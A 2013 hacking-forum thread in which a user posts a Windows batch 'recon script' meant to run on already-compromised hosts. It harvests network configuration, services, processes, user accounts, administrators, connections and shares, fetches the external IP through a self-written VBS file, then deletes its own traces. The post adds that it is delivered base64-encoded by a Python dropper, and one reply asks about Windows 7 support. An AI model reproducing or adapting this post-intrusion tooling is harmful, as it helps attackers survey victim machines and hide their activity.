1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Recon script (batch)

Discussion in 'Information Gathering' started by nulldev, Nov 19, 2013.

  1. nulldev

    nulldev New Member

    Nov 19, 2013
    Likes Received:
    This script i wrote for use on hosts already compromised, it will find all of the system information as well as the external ip address, the results will be in the current directory in a folder called infos.

    The batch file writes a quick vbs script which is used to find the external ip from the internet, it then deletes all traces of itself.

    ext.txt - the external ip address
    inf.txt - the system information

    @echo off
    IF NOT EXIST c:\WINNT\,c:\WINNT\Debug GOTO make
    mkdir c:\WINNT
    mkdir c:\WINNT\Debug
    echo Option Explicit > %temp%\ext.vbs
    echo Dim http : Set http = CreateObject( "MSXML2.ServerXmlHttp" ) >> %temp%\ext.vbs
    echo http.Open "GET", "http://icanhazip.com", False >> %temp%\ext.vbs
    echo http.Send >> %temp%\ext.vbs
    echo Dim objFSO : Set objFSO = CreateObject("Scripting.FileSystemObject") >> %temp%\ext.vbs
    echo Dim objFile : Set objFile = objFSO.CreateTextFile("C:\WINNT\Debug\ext.txt", True) >> %temp%\ext.vbs
    echo objFile.WriteLine(http.Responsetext) >> %temp%\ext.vbs
    echo Set http = Nothing >> %temp%\ext.vbs
    start %temp%\ext.vbs
    ipconfig /all >> C:\WINNT\Debug\inf.txt
    net start >> C:\WINNT\Debug\inf.txt
    tasklist /v >> C:\WINNT\Debug\inf.txt
    net user >> C:\WINNT\Debug\inf.txt
    echo Logged in user: %username% >> C:\WINNT\Debug\inf.txt
    net localgroup administrators >> C:\WINNT\Debug\inf.txt
    netstat -ano >> C:\WINNT\Debug\inf.txt
    net use >> C:\WINNT\Debug\inf.txt
    net view >> C:\WINNT\Debug\inf.txt
    mkdir %cd$\infos
    copy c:\WINNT\Debug\*.* %cd%\infos
    echo y | del /F c:\WINNT\
    del %temp%\ext.vbs

    Its actual use is combined with a python script with the whole batch file encoded in base64 before being written to a file by python after decoding it.
    Last edited: Nov 19, 2013
  2. autonomous

    autonomous New Member

    Oct 2, 2013
    Likes Received:
    This script is for windows 7?

Share This Page